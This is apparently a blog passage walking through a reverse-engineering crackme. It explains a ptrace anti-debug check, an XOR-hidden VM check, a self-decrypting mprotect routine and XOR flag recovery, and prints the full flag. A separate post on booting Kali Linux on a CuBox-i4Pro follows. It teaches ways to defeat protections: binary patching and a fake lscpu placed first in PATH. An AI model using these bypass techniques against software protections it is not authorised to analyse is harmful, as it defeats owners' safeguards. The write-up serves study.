  char v8; // [esp+Bh] [ebp-4Dh]
  char v9; // [esp+Ch] [ebp-4Ch]
  char v10; // [esp+Dh] [ebp-4Bh]
  char v11; // [esp+Eh] [ebp-4Ah]
  char v12; // [esp+Fh] [ebp-49h]
  char v13; // [esp+10h] [ebp-48h]
  char v14; // [esp+11h] [ebp-47h]
  char v15; // [esp+12h] [ebp-46h]
  char v16; // [esp+13h] [ebp-45h]
  char v17; // [esp+14h] [ebp-44h]
  char v18; // [esp+15h] [ebp-43h]
  char v19; // [esp+16h] [ebp-42h]
  char v20; // [esp+17h] [ebp-41h]
  char v21; // [esp+18h] [ebp-40h]
  char v22; // [esp+19h] [ebp-3Fh]
  char v23; // [esp+1Ah] [ebp-3Eh]
  char v24; // [esp+1Bh] [ebp-3Dh]
  char v25; // [esp+1Ch] [ebp-3Ch]
  char v26; // [esp+1Dh] [ebp-3Bh]
  char v27; // [esp+1Eh] [ebp-3Ah]
  char v28; // [esp+1Fh] [ebp-39h]
  char v29; // [esp+20h] [ebp-38h]
  char v30; // [esp+21h] [ebp-37h]
  char v31; // [esp+22h] [ebp-36h]
  char v32; // [esp+23h] [ebp-35h]
  char v33; // [esp+24h] [ebp-34h]
  char v34; // [esp+25h] [ebp-33h]
  char v35; // [esp+26h] [ebp-32h]
  char v36; // [esp+27h] [ebp-31h]
  char v37; // [esp+28h] [ebp-30h]
  char v38; // [esp+29h] [ebp-2Fh]
  char v39; // [esp+2Ah] [ebp-2Eh]
  char v40; // [esp+2Bh] [ebp-2Dh]
  char v41; // [esp+2Ch] [ebp-2Ch]
  char v42; // [esp+2Dh] [ebp-2Bh]
  char v43; // [esp+2Eh] [ebp-2Ah]
  char v44; // [esp+2Fh] [ebp-29h]
  char v45; // [esp+30h] [ebp-28h]
  char v46; // [esp+31h] [ebp-27h]
  char v47; // [esp+32h] [ebp-26h]
  char v48; // [esp+33h] [ebp-25h]
  char v49; // [esp+34h] [ebp-24h]
  char v50; // [esp+35h] [ebp-23h]
  char v51; // [esp+36h] [ebp-22h]
  char v52; // [esp+37h] [ebp-21h]
  int stat_loc; // [esp+38h] [ebp-20h]
  __pid_t ParentPID; // [esp+3Ch] [ebp-1Ch]
  FILE *stream; // [esp+40h] [ebp-18h]
  __pid_t ChangedStateChildPID; // [esp+44h] [ebp-14h]
  __pid_t ChildPID; // [esp+48h] [ebp-10h]
  unsigned int i; // [esp+4Ch] [ebp-Ch]

  ChildPID = fork();
  if ( !ChildPID )
  {
    ParentPID = getppid();
    if ( ptrace(PTRACE_ATTACH, ParentPID, 0, 0) )
    {
      stat_loc = 1;
      exit(1);
    }
    sleep(5u);
    ptrace(PTRACE_DETACH, ParentPID, 0, 0);
    exit(0);
  }
  if ( ChildPID == -1 )
    exit(1);
  do
    ChangedStateChildPID = waitpid(ChildPID, &stat_loc, 0);
  while ( ChangedStateChildPID == -1 && *__errno_location() == 4 );
  if ( BYTE1(stat_loc) )
  {
    printf("[-] You fool, nobody debugs me!!!\n%d\n", BYTE1(stat_loc));
    exit(-1);
  }
  command = 0x19;
  v2 = 6;
  v3 = 0x16;
  v4 = 5;
  v5 = 0;
  v6 = 0x55;
  v7 = 9;
  v8 = 0x55;
  v9 = 0x12;
  v10 = 7;
  v11 = 0x10;
  v12 = 5;
  v13 = 0x55;
  v14 = 0x52;
  v15 = 0x3D;
  v16 = 0xC;
  v17 = 5;
  v18 = 0x10;
  v19 = 7;
  v20 = 3;
  v21 = 0x1C;
  v22 = 6;
  v23 = 0x1A;
  v24 = 7;
  v25 = 0x52;
  v26 = 0x55;
  v27 = 9;
  v28 = 0x55;
  v29 = 1;
  v30 = 7;
  v31 = 0x55;
  v32 = 0x58;
  v33 = 0x11;
  v34 = 0x55;
  v35 = 0x52;
  v36 = 0x55;
  v37 = 0x52;
  v38 = 0x55;
  v39 = 9;
  v40 = 0x55;
  v41 = 0x16;
  v42 = 0;
  v43 = 1;
  v44 = 0x55;
  v45 = 0x58;
  v46 = 0x11;
  v47 = 0x4F;
  v48 = 0x55;
  v49 = 0x58;
  v50 = 0x13;
  v51 = 0x47;
  v52 = 0;
  for ( i = 0; i <= 50; ++i )
    *(&command + i) ^= 0x75u;
  stream = popen(&command, "r");
  if ( stream && fgetc(stream) != -1 )
  {
    puts("[-] No vm please ;)");
    exit(-1);
  }
  return fclose(stream);
}
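
The BYTE1(stat_loc) test in the pseudo-code reads the second byte of the status word filled in by waitpid(). On Linux that byte holds the child's exit code, the value that the WEXITSTATUS macro extracts. Here is a small sketch of the decoding; the helper names are hypothetical and the status values are examples, not values captured from the binary.

```python
def exit_code_from_status(stat_loc: int) -> int:
    """Return bits 8..15 of a Linux wait status, which IDA shows as BYTE1(stat_loc)."""
    return (stat_loc >> 8) & 0xFF


def parent_detects_debugger(stat_loc: int) -> bool:
    """Mirror the parent's check: a non-zero exit code from the child means 'debugger'."""
    return exit_code_from_status(stat_loc) != 0


if __name__ == "__main__":
    # A child that called exit(1) after a failed PTRACE_ATTACH yields status 0x0100.
    print(parent_detects_debugger(0x0100))  # True
    # A child that detached cleanly and called exit(0) yields status 0x0000.
    print(parent_detects_debugger(0x0000))  # False
```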

First round of conclusions

Right now it may seem pretty easy, but for me at that time this was impossible to understand, and it represented the first big failure: I was not prepared to interpret assembly XOR instructions, decryption loops and Linux library calls. I spent almost an entire weekend on this and failed hard. Because of the time constraints of the job selection, I sent my results without this last exercise, and maybe this influenced my performance in the selection. How do we bypass all these checks? We need to find where this function is called from; maybe we can modify the code flow to avoid the call.

Jumping away

With IDA's basic functionality, we can find where this function is called from and, luckily for us, it's called from a single location.

The instruction that calls the function is located inside sub_E00 and, in particular, IDA shows it as: call ds:(off_2EF0-3000h) [ebx+edi*4]. Looking around this code, we can patch the jz short loc_E55 into a jmp, so that we circumvent all of the above protections.

Cheating with the shell

If you don't want to patch the binary, there's another way to fool the VM check, although not the anti-debug one. Notice that the command passed as an argument to popen() is a normal shell command, but lscpu is invoked without an absolute path, so the shell looks it up through the PATH variable. So a quick and dirty trick is to create a fake lscpu like this:

#!/bin/bash
echo "I will run you anyway in this VM"

Be sure to put the directory containing the fake script at the front of the PATH variable and make the script executable, and you're basically done: when the binary tries to execute the lscpu command, it runs the fake one, whose output doesn't contain the Hypervisor string, so grep prints nothing and fgetc consequently reads nothing. The VM check passes. As easy as it seems.
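
To see the PATH trick in isolation, without the CTF binary, the sketch below builds a fake lscpu in a temporary directory, puts that directory first in PATH and runs the very same pipeline. It is an illustration under assumptions: the function name is made up, the fake script uses /bin/sh instead of /bin/bash, and grep, tr and cut are expected to be installed.

```python
import os
import stat
import subprocess
import tempfile

# The shell command decrypted from the binary.
CHECK = "lscpu | grep 'Hypervisor' | tr -d ' ' | cut -d: -f2"
# Same idea as the fake script above, with /bin/sh as the interpreter.
FAKE_LSCPU = '#!/bin/sh\necho "I will run you anyway in this VM"\n'


def run_check_with_fake_lscpu() -> str:
    """Run the pipeline with a fake lscpu placed first in PATH and return its stdout."""
    with tempfile.TemporaryDirectory() as fake_dir:
        fake_path = os.path.join(fake_dir, "lscpu")
        with open(fake_path, "w") as handle:
            handle.write(FAKE_LSCPU)
        # The script must be executable, otherwise the shell cannot run it.
        os.chmod(fake_path, os.stat(fake_path).st_mode | stat.S_IXUSR)

        env = dict(os.environ)
        # Prepending matters: the shell uses the first lscpu it finds in PATH.
        env["PATH"] = fake_dir + os.pathsep + env.get("PATH", os.defpath)
        result = subprocess.run(CHECK, shell=True, env=env,
                                capture_output=True, text=True)
        return result.stdout


if __name__ == "__main__":
    # An empty string means fgetc() in the binary would read nothing.
    print(repr(run_check_with_fake_lscpu()))
```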

Analyzing the self decrypting and injecting routine

We can take advantage of the debugging capabilities of IDA and play with breakpoints. Single-stepping through the program flow, after the above routines, we land in an interesting piece of code.

I spent a lot of days trying to understand this routine, but it was worth it because I learned a lot: I learned about the mprotect syscall and about library functions like calloc and memcpy. I learned how code can decrypt itself and inject the result into the binary itself, and how memory protections can be changed back and forth. Indeed, it was very helpful to read this code side by side with its decompiled version:

int sub_CB5()
{
  char v0; // si
  size_t v1; // eax
  char s; // [esp+8h] [ebp-30h]
  char v4; // [esp+9h] [ebp-2Fh]
  char v5; // [esp+Ah] [ebp-2Eh]
  char v6; // [esp+Bh] [ebp-2Dh]
  char v7; // [esp+Ch] [ebp-2Ch]
  char v8; // [esp+Dh] [ebp-2Bh]
  char v9; // [esp+Eh] [ebp-2Ah]
  char v10; // [esp+Fh] [ebp-29h]
  char v11; // [esp+10h] [ebp-28h]
  char v12; // [esp+11h] [ebp-27h]
  char v13; // [esp+12h] [ebp-26h]
  char v14; // [esp+13h] [ebp-25h]
  char v15; // [esp+14h] [ebp-24h]
  char v16; // [esp+15h] [ebp-23h]
  char v17; // [esp+16h] [ebp-22h]
  char v18; // [esp+17h] [ebp-21h]
  char v19; // [esp+18h] [ebp-20h]
  char v20; // [esp+19h] [ebp-1Fh]
  char v21; // [esp+1Ah] [ebp-1Eh]
  char v22; // [esp+1Bh] [ebp-1Dh]
  void *src; // [esp+1Ch] [ebp-1Ch]
  _BYTE *v24; // [esp+20h] [ebp-18h]
  void *addr; // [esp+24h] [ebp-14h]
  size_t n; // [esp+28h] [ebp-10h]
  size_t i; // [esp+2Ch] [ebp-Ch]

  n = 320;
  addr = 0;
  v24 = &unk_E78;
  mprotect(0, (size_t)((char *)&unk_E78 - 0xFFFFD000 - 12288), 6);
  s = 0xF9u;
  v4 = 0xFCu;
  v5 = 0xFFu;
  v6 = 0xE6u;
  v7 = 0xF5u;
  v8 = 0xE0u;
  v9 = 0xF1u;
  v10 = 0xF3u;
  v11 = 0xFBu;
  v12 = 0xF9u;
  v13 = 0xFEu;
  v14 = 0xF7u;
  v15 = 0xFDu;
  v16 = 0xE9u;
  v17 = 0xF3u;
  v18 = 0xFFu;
  v19 = 0xF4u;
  v20 = 0xF5u;
  v21 = 0;
  src = calloc(0x141u, 1u);
  for ( i = 0; i < n; ++i )
  {
    v22 = *((_BYTE *)sub_89B + i);
    v0 = v22 ^ 0x90;
    v1 = strlen(&s);
    *((_BYTE *)src + i) = *(&s + i % v1) ^ v0;
  }
  memcpy(sub_89B, src, n);
  return mprotect(addr, v24 - (_BYTE *)addr, 4);
}

TL;DR

Before we go deep into the details of the single blocks of code, a general overview of its final purpose may help. First, the code uses mprotect to change the memory protections of a specific part of its .text section, adding the write permission. After that, it copies onto the stack some bytes that will turn out to be the key for the decryption that follows. Before entering the main loop, it allocates a zero-filled buffer of 0x141 bytes on the heap via calloc; the number of bytes to decrypt, 0x140, is saved in a local variable on the stack at [ebp+n]. The main loop is somewhat complicated: byte by byte, it XORs part of its own code, located at sub_89B+i, with the fixed constant 0x90 and then XORs the result again with the aforementioned key on the stack. After that, it overwrites the code at sub_89B with the new values via memcpy, removes the write permission from that code section with a second mprotect call, and returns. Let's break it down line by line, considering only the useful ones.

Here, it sets the length of the future array, 0x140 or 320 one-byte elements, in the variable placed on the stack at [ebp+n]. After that, it prepares the arguments of the next call to mprotect, which will change the protection, enabling the write permission, at address 0x5657D000. Let's look at the stack.

With ESP pointing at 0xFFC344F0, the calling convention dictates that the arguments of a function must be pushed onto the stack in reverse order. The mprotect call is defined as: int mprotect(void *addr, size_t len, int prot); with

  • prot = 6
  • len = 0xE78
  • *addr = 0x5657D000

In other words: change the permissions of the 3704-byte (0xE78) memory area starting at address 0x5657D000, making it writable: prot = 6 is PROT_WRITE | PROT_EXEC. More info on this syscall here. But what's at this address? It's the ELF header, basically the start of the entire binary.
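
To double-check the numbers passed to mprotect, here is a small sketch that decodes a prot value into its flag names. The constants are the Linux values from <sys/mman.h>; the helper name describe_prot is made up for this example.

```python
# Protection flags as defined on Linux in <sys/mman.h>.
PROT_READ = 0x1
PROT_WRITE = 0x2
PROT_EXEC = 0x4


def describe_prot(prot: int) -> str:
    """Turn an mprotect() prot value into a readable list of flag names."""
    flags = (("PROT_READ", PROT_READ),
             ("PROT_WRITE", PROT_WRITE),
             ("PROT_EXEC", PROT_EXEC))
    names = [name for name, bit in flags if prot & bit]
    return " | ".join(names) if names else "PROT_NONE"


if __name__ == "__main__":
    print(describe_prot(6))  # first mprotect call: PROT_WRITE | PROT_EXEC
    print(describe_prot(4))  # last mprotect call: PROT_EXEC
    print(0xE78)             # length of the area in decimal: 3704
```

Neither value contains PROT_READ, yet the routine reads its own code; as far as I know, on 32-bit x86 a page that is writable or executable is readable in practice.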

Going further, we can see some bytes being moved onto the stack, a call to calloc that allocates an array of 320+1 null bytes on the heap, and the setup of a loop counter, placed at [ebp+var_C], that runs up to the number of bytes to decrypt. We're setting up a loop that scans, byte by byte, a specific area of the binary located at 0x5657D89B (a fixed value) and XORs every byte first with 0x90 and then with the bytes that were moved onto the stack. To better understand this loop, I suggest reading the answer I got here. When this decryption loop ends, the decrypted code sits on the heap, in the allocated array. The encrypted code can now be replaced with the decrypted one via the memcpy call. Finally, the write permission can be removed and the routine can return.
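
The double XOR is easier to follow when replayed outside the binary. The sketch below copies the 18 key bytes from the decompiled sub_CB5 and mirrors its loop. Since XOR is associative, the constant 0x90 can be folded into the key, which reveals the effective repeating key as readable text. The sample input is made up; it is not the real content of sub_89B.

```python
# Key bytes moved onto the stack in sub_CB5 (the trailing 0 terminator is left out).
KEY = bytes([0xF9, 0xFC, 0xFF, 0xE6, 0xF5, 0xE0, 0xF1, 0xF3, 0xFB,
             0xF9, 0xFE, 0xF7, 0xFD, 0xE9, 0xF3, 0xFF, 0xF4, 0xF5])
CONSTANT = 0x90


def decrypt(encrypted: bytes) -> bytes:
    """Mirror the loop: out[i] = key[i % len(key)] ^ (in[i] ^ 0x90)."""
    return bytes(KEY[i % len(KEY)] ^ (byte ^ CONSTANT)
                 for i, byte in enumerate(encrypted))


# Folding the constant into the key gives the effective repeating key.
EFFECTIVE_KEY = bytes(k ^ CONSTANT for k in KEY)

if __name__ == "__main__":
    print(EFFECTIVE_KEY.decode("ascii"))  # ilovepackingmycode
    sample = bytes(range(40))             # made-up bytes, NOT the real code at sub_89B
    # XOR is its own inverse, so applying the routine twice restores the input.
    print(decrypt(decrypt(sample)) == sample)  # True
```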

Second round of conclusions

Many days and months passed with me staring at this routine and failing hard to understand it. But the feeling was still the same: I wanted to see that "[+] Good job! ;)" string, and I've always had the Try Harder approach. Understanding this loop wasn't easy, not even close. I asked for help and, luckily, I got plenty. This is what I learned: don't be afraid to ask for help, but don't blindly ask for a solution. Work on it, show that you studied the problem and failed; people will eventually see that and help you.

Towards the victory

After executing the decryption function, we land in the code below. First, it verifies that the user submitted a password of exactly 0x27 characters, a fixed value coming from this instruction: mov eax, (dword_56561058 - 56561000h) [ebx].

Only if the password is exactly 39 characters long does it move on to the DecryptedFunction, passing the user's password as the argument. The previous experience helped a lot in understanding this function, and the pseudo-code generated by IDA is pretty nice.

int __cdecl DecryptedFunction(int UserSubmittedPassword)
{
  int result; // eax
  char v2; // [esp+0h] [ebp-38h]
  char v3; // [esp+1h] [ebp-37h]
  char v4; // [esp+2h] [ebp-36h]
  char v5; // [esp+3h] [ebp-35h]
  char v6; // [esp+4h] [ebp-34h]
  char v7; // [esp+5h] [ebp-33h]
  char v8; // [esp+6h] [ebp-32h]
  char v9; // [esp+7h] [ebp-31h]
  char v10; // [esp+8h] [ebp-30h]
  char v11; // [esp+9h] [ebp-2Fh]
  char v12; // [esp+Ah] [ebp-2Eh]
  char v13; // [esp+Bh] [ebp-2Dh]
  char v14; // [esp+Ch] [ebp-2Ch]
  char v15; // [esp+Dh] [ebp-2Bh]
  char v16; // [esp+Eh] [ebp-2Ah]
  char v17; // [esp+Fh] [ebp-29h]
  char v18; // [esp+10h] [ebp-28h]
  char v19; // [esp+11h] [ebp-27h]
  char v20; // [esp+12h] [ebp-26h]
  char v21; // [esp+13h] [ebp-25h]
  char v22; // [esp+14h] [ebp-24h]
  char v23; // [esp+15h] [ebp-23h]
  char v24; // [esp+16h] [ebp-22h]
  char v25; // [esp+17h] [ebp-21h]
  char v26; // [esp+18h] [ebp-20h]
  char v27; // [esp+19h] [ebp-1Fh]
  char v28; // [esp+1Ah] [ebp-1Eh]
  char v29; // [esp+1Bh] [ebp-1Dh]
  char v30; // [esp+1Ch] [ebp-1Ch]
  char v31; // [esp+1Dh] [ebp-1Bh]
  char v32; // [esp+1Eh] [ebp-1Ah]
  char v33; // [esp+1Fh] [ebp-19h]
  char v34; // [esp+20h] [ebp-18h]
  char v35; // [esp+21h] [ebp-17h]
  char v36; // [esp+22h] [ebp-16h]
  char v37; // [esp+23h] [ebp-15h]
  char v38; // [esp+24h] [ebp-14h]
  char v39; // [esp+25h] [ebp-13h]
  char v40; // [esp+26h] [ebp-12h]
  unsigned __int8 v41; // [esp+27h] [ebp-11h]
  int counter; // [esp+28h] [ebp-10h]
  int v43; // [esp+2Ch] [ebp-Ch]

  v43 = 0;
  v2 = 0x93u;
  v3 = 0x5E;
  v4 = 0xB0u;
  v5 = 0xB8u;
  v6 = 0xC5u;
  v7 = 0xD7u;
  v8 = 0xACu;
  v9 = 0x23;
  v10 = 0xC3u;
  v11 = 0xF0u;
  v12 = 6;
  v13 = 0x72;
  v14 = 0xF4u;
  v15 = 0x74;
  v16 = 0x93u;
  v17 = 0x52;
  v18 = 0x74;
  v19 = 0x72;
  v20 = 0x30;
  v21 = 0xEDu;
  v22 = 0x8Bu;
  v23 = 0x3D;
  v24 = 4;
  v25 = 0x58;
  v26 = 0xD8u;
  v27 = 0xE5u;
  v28 = 0xA2u;
  v29 = 0xCFu;
  v30 = 0x8Au;
  v31 = 0xEDu;
  v32 = 0x8Bu;
  v33 = 0x5C;
  v34 = 0x5E;
  v35 = 0x61;
  v36 = 0xDCu;
  v37 = 0x31;
  v38 = 0xCFu;
  v39 = 0x91u;
  v40 = 0x82u;
  for ( counter = 0; counter < PasswordLength; ++counter )
  {
    v41 = *((_BYTE *)AntiAnalysisFunction + counter + 0xC7);
    if ( (v41 ^ *(_BYTE *)(counter + UserSubmittedPassword)) != *(&v2 + counter) )
    {
      v43 = 1;
      break;
    }
  }
  if ( v43 )
    result = puts("[-] Nope!");
  else
    result = puts("[+] Good job! ;)");
  return result;
}

It scans the user's password, character by character, XORing each character with a byte retrieved from the binary itself and comparing the result with the corresponding byte of the hardcoded string. If the bytes match, the loop continues; otherwise it breaks. In the end, if everything is correct, it prints the beloved success string. How can we retrieve the correct flag? If we dump the 39 bytes from the binary, from the correct addresses, and XOR them with the hardcoded string, we can take advantage of the reversible nature of XOR. Although you can find more details here, we're basically saying this:

A xor B = C
A xor C = B
B xor C = A

My first approach was to brute-force the routine: if the submitted string is, say, \x41\x41\x41\x41\x41\x41\x41..., we can single-step through the code up to the final cmp instruction, retrieve the byte it compares against and change the zero flag to force the loop to continue instead of stopping. Alternatively, we can dump the contents of the memory and XOR them with the hardcoded string; the result is the flag that needs to be submitted to the binary.

We know that we need the 39 (0x27) bytes starting at *((_BYTE *)AntiAnalysisFunction + 0 + 0xC7) and ending just before *((_BYTE *)AntiAnalysisFunction + 0x27 + 0xC7), that is, from 0x5662AAA3 = (0x5662A9DC + 0 + 0xC7) up to, but not including, 0x5662AACA = (0x5662A9DC + 0x27 + 0xC7). We can apply the XOR operation with the known string and finally retrieve the flag.

Hardcoded: 93 5E B0 B8 C5 D7 AC 23 C3 F0 06 72 F4 74 93 52 74 72 30 ED 8B 3D 04 58 D8 E5 A2 CF 8A ED 8B 5C 5E 61 DC 31 CF 91 82 
             
Memory dump: E8 18 FC FF FF 83 C4 10 85 C0 74 11 C7 45 E0 01 00 00 00 83 EC 0C 6A 01 E8 90 FB FF FF 83 EC 0C 6A 05 E8 46 FB FF FF

Flag hex: 7B 46 4C 47 3A 54 68 33 46 30 72 63 33 31 73 53 74 72 30 6E 67 31 6E 59 30 75 59 30 75 6E 67 50 34 64 34 77 34 6E 7D
Flag ascii:  {  F  L  G  :  T  h  3  F  0  r  c  3  1  s  S  t  r  0  n  g  1  n  Y  0  u  Y  0  u  n  g  P  4  d  4  w  4  n  }
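
The same computation can be reproduced with a few lines of Python. This sketch simply XORs the two byte strings listed above, pair by pair; the function name recover_flag is made up for this example.

```python
# The 39 hardcoded bytes from DecryptedFunction (v2..v40).
HARDCODED = bytes.fromhex(
    "93 5E B0 B8 C5 D7 AC 23 C3 F0 06 72 F4 74 93 52 74 72 30 ED "
    "8B 3D 04 58 D8 E5 A2 CF 8A ED 8B 5C 5E 61 DC 31 CF 91 82"
)
# The 39 bytes dumped from memory at AntiAnalysisFunction + 0xC7.
MEMORY_DUMP = bytes.fromhex(
    "E8 18 FC FF FF 83 C4 10 85 C0 74 11 C7 45 E0 01 00 00 00 83 "
    "EC 0C 6A 01 E8 90 FB FF FF 83 EC 0C 6A 05 E8 46 FB FF FF"
)


def recover_flag(hardcoded: bytes, code_bytes: bytes) -> str:
    """XOR the two byte strings pairwise: if password ^ code == hardcoded, then password == hardcoded ^ code."""
    return bytes(a ^ b for a, b in zip(hardcoded, code_bytes)).decode("ascii")


if __name__ == "__main__":
    print(recover_flag(HARDCODED, MEMORY_DUMP))
    # prints {FLG:Th3F0rc31sStr0ng1nY0uY0ungP4d4w4n}
```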

Conclusions

This was a long journey that required a lot of effort and countless sleepless nights. Was it worth it? Every single minute, without any doubt. I hope this post will help you in your studies. If you spot any errors or want to help me in my journey into the reverse engineering world, please leave a comment, tweet or e-mail.

As always, Try Harder.

How to fix and boot Kali Linux on the SolidRun CuBox-i4Pro

12 February 2019 at 09:45
By: Kartone

If you tried to burn and run the Kali image that can be downloaded from the Offensive Security website, you probably ended up with a system that doesn't boot.

U-Boot SPL 2018.05+dfsg-1 (May 10 2018 - 20:24:57 +0000)
Trying to boot from MMC1


U-Boot 2018.05+dfsg-1 (May 10 2018 - 20:24:57 +0000)

CPU:   Freescale i.MX6Q rev1.2 996 MHz (running at 792 MHz)
CPU:   Extended Commercial temperature grade (-20C to 105C) at 19C
Reset cause: POR
Board: MX6 Cubox-i
DRAM:  2 GiB
MMC:   FSL_SDHC: 0
Loading Environment from MMC... *** Warning - bad CRC, using default environment

Failed (-5)
No panel detected: default to HDMI
Display: HDMI (1024x768)
In:    serial
Out:   serial
Err:   serial
Net:   FEC
Hit any key to stop autoboot:  0
switch to partitions #0, OK
mmc0 is current device
Scanning mmc 0:1...
AHCI 0001.0300 32 slots 1 ports 3 Gbps 0x1 impl SATA mode
flags: ncq stag pm led clo only pmp pio slum part
No port device detected!

Device 0: Model:  Firm:  Ser#:
            Type: Hard Disk
            Capacity: not available
... is now current device
timeout exit!
timeout exit!
timeout exit!
timeout exit!
timeout exit!
timeout exit!

This is how you can fix it.

First, go here and download the image. Burn it onto a nice, fast SD card as described in the tutorial. On my system, the SD card is located at /dev/sdb; adjust the command according to your setup.

xzcat kali-linux-2018.4-cuboxi.img.xz | dd of=/dev/sdb bs=512k

Now mount the image wherever you like and chroot into it. You should be able to browse it:

[email protected]:/# ll
total 84K
drwxr-xr-x  18 root root 4,0K feb 11 11:50 .
drwxr-xr-x  18 root root 4,0K feb 11 11:50 ..
lrwxrwxrwx   1 root root    7 ott 17 19:08 bin -> usr/bin
drwxr-xr-x   3 root root 4,0K feb 11 11:56 boot
drwxr-xr-x   4 root root 4,0K ott 17 19:08 dev
drwxr-xr-x 109 root root 4,0K feb 11 18:04 etc
drwxr-xr-x   2 root root 4,0K set 12 08:36 home
lrwxrwxrwx   1 root root   34 feb 11 11:50 initrd.img -> boot/initrd.img-4.19.0-kali1-armmp
lrwxrwxrwx   1 root root   34 ott 17 19:24 initrd.img.old -> boot/initrd.img-4.18.0-kali2-armmp
lrwxrwxrwx   1 root root    7 ott 17 19:08 lib -> usr/lib
drwx------   2 root root  16K ott 17 19:39 lost+found
drwxr-xr-x   2 root root 4,0K ott 17 19:08 media
drwxr-xr-x   2 root root 4,0K ott 17 19:08 mnt
drwxr-xr-x   4 root root 4,0K feb 11 12:23 opt
drwxr-xr-x   2 root root 4,0K set 12 08:36 proc
drwx------   9 root root 4,0K feb 11 17:43 root
drwxr-xr-x   2 root root 4,0K set 12 08:36 run
lrwxrwxrwx   1 root root    8 ott 17 19:08 sbin -> usr/sbin
drwxr-xr-x   2 root root 4,0K ott 17 19:08 srv
drwxr-xr-x   2 root root 4,0K set 12 08:36 sys
drwxrwxrwt  10 root root 4,0K feb 11 19:42 tmp
drwxr-xr-x  10 root root 4,0K ott 17 19:08 usr
drwxr-xr-x  12 root root 4,0K ott 17 19:23 var
lrwxrwxrwx   1 root root   31 feb 11 11:50 vmlinuz -> boot/vmlinuz-4.19.0-kali1-armmp
lrwxrwxrwx   1 root root   31 ott 17 19:24 vmlinuz.old -> boot/vmlinuz-4.18.0-kali2-armmp
[email protected]:/# 

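Go into the /boot directory and create a symlink named dtbs that points to /usr/lib/linux-image-$(uname -r), where the version must be the one of the kernel installed in the image; in my case it's the 4.19.0 kernel. Verify it for your own Kali version: inside a chroot, uname -r reports the kernel of the host, so check the directory names under /usr/lib instead.

Also, create the extlinux directory and, inside of it, create a file named extlinux.conf. You should now end up with this layout.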
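
If you prefer to script these two steps, they can be sketched as below. The function name prepare_boot_dir is made up for this example, and the demo runs against a scratch directory rather than a real /boot; the kernel version string is the one from my image and is an assumption for yours.

```python
import os
import tempfile


def prepare_boot_dir(boot_dir: str, kernel_version: str) -> str:
    """Create the dtbs symlink and an empty extlinux/extlinux.conf under boot_dir.

    Raises FileExistsError if a dtbs entry is already present.
    """
    target = f"/usr/lib/linux-image-{kernel_version}/"
    # The symlink target does not need to exist on the machine running this.
    os.symlink(target, os.path.join(boot_dir, "dtbs"))
    extlinux_dir = os.path.join(boot_dir, "extlinux")
    os.makedirs(extlinux_dir, exist_ok=True)
    conf_path = os.path.join(extlinux_dir, "extlinux.conf")
    # Create the file if missing; its content still has to be written by hand.
    open(conf_path, "a").close()
    return conf_path


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as scratch:
        print(prepare_boot_dir(scratch, "4.19.0-kali1-armmp"))
        print(os.readlink(os.path.join(scratch, "dtbs")))
```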

[email protected]:/boot# ll
total 53M
drwxr-xr-x  3 root root 4,0K feb 11 11:56 .
drwxr-xr-x 18 root root 4,0K feb 11 11:50 ..
-rw-r--r--  1 root root 203K ott  9 14:47 config-4.18.0-kali2-armmp
-rw-r--r--  1 root root 205K gen  3 08:34 config-4.19.0-kali1-armmp
lrwxrwxrwx  1 root root   40 feb 11 11:56 dtbs -> /usr/lib/linux-image-4.19.0-kali1-armmp/
drwxr-xr-x  2 root root 4,0K feb 11 11:55 extlinux
-rw-r--r--  1 root root  19M ott 17 19:38 initrd.img-4.18.0-kali2-armmp
-rw-r--r--  1 root root  20M feb 11 11:52 initrd.img-4.19.0-kali1-armmp
-rw-r--r--  1 root root 3,0M ott  9 14:47 System.map-4.18.0-kali2-armmp
-rw-r--r--  1 root root 3,0M gen  3 08:34 System.map-4.19.0-kali1-armmp
-rw-r--r--  1 root root 4,0M ott  9 14:47 vmlinuz-4.18.0-kali2-armmp
-rw-r--r--  1 root root 4,1M gen  3 08:34 vmlinuz-4.19.0-kali1-armmp
[email protected]:/boot# ll ./extlinux/
total 12K
drwxr-xr-x 2 root root 4,0K feb 11 11:55 .
drwxr-xr-x 3 root root 4,0K feb 11 11:56 ..
-rw-r--r-- 1 root root  267 feb 11 11:55 extlinux.conf
[email protected]:/boot# 

Now edit extlinux.conf so that it contains these settings:

[email protected]:~# cat /boot/extlinux/extlinux.conf 
PROMPT 5
TIMEOUT 50
DEFAULT Kali

LABEL Kali
KERNEL /vmlinuz
FDTDIR /boot/dtbs/
INITRD /initrd.img
APPEND root=/dev/mmcblk1p1 rootfstype=ext4 video=mxcfb0:dev=hdmi,[email protected],if=RGB24,bpp=32 console=ttymxc0,115200n8 console=tty1 consoleblank=0 rw rootwait

Note that, starting from kernel 4.9, the device naming changed: the first device is mmcblk1 and not mmcblk0. As the downloaded Kali image has only one partition, you need to use the /dev/mmcblk1p1 device.

fdisk -l /dev/sdb
Disk /dev/sdb: 14,9 GiB, 15931539456 bytes, 31116288 sectors
Disk model: SD Card Reader  
Units: sectors of 1 * 512 = 512 bytes
Sector size (logical/physical): 512 bytes / 512 bytes
I/O size (minimum/optimal): 512 bytes / 512 bytes
Disklabel type: dos
Disk identifier: 0x38f6e81f

Device     Boot Start      End  Sectors  Size Id Type
/dev/sdb1        2048 31115263 31113216 14,9G 83 Linux

That's all. Now U-Boot should be fixed and able to boot your kernel.

U-Boot SPL 2018.05+dfsg-1 (May 10 2018 - 20:24:57 +0000)
Trying to boot from MMC1


U-Boot 2018.05+dfsg-1 (May 10 2018 - 20:24:57 +0000)

CPU:   Freescale i.MX6Q rev1.2 996 MHz (running at 792 MHz)
CPU:   Extended Commercial temperature grade (-20C to 105C) at 19C
Reset cause: POR
Board: MX6 Cubox-i
DRAM:  2 GiB
MMC:   FSL_SDHC: 0
Loading Environment from MMC... *** Warning - bad CRC, using default environment

Failed (-5)
No panel detected: default to HDMI
Display: HDMI (1024x768)
In:    serial
Out:   serial
Err:   serial
Net:   FEC
Hit any key to stop autoboot:  0 
switch to partitions #0, OK
mmc0 is current device
Scanning mmc 0:1...
Found /boot/extlinux/extlinux.conf
Retrieving file: /boot/extlinux/extlinux.conf
267 bytes read in 114 ms (2 KiB/s)
1:	Kali
Retrieving file: /boot/extlinux/../../initrd.img
20026342 bytes read in 1220 ms (15.7 MiB/s)
Retrieving file: /boot/extlinux/../../vmlinuz
4203008 bytes read in 479 ms (8.4 MiB/s)
append: root=/dev/mmcblk1p1 rootfstype=ext4 video=mxcfb0:dev=hdmi,[email protected],if=RGB24,bpp=32 console=ttymxc0,115200n8 console=tty1 consoleblank=0 rw rootwait
Retrieving file: /boot/extlinux/../dtbs/imx6q-cubox-i.dtb
36853 bytes read in 2755 ms (12.7 KiB/s)
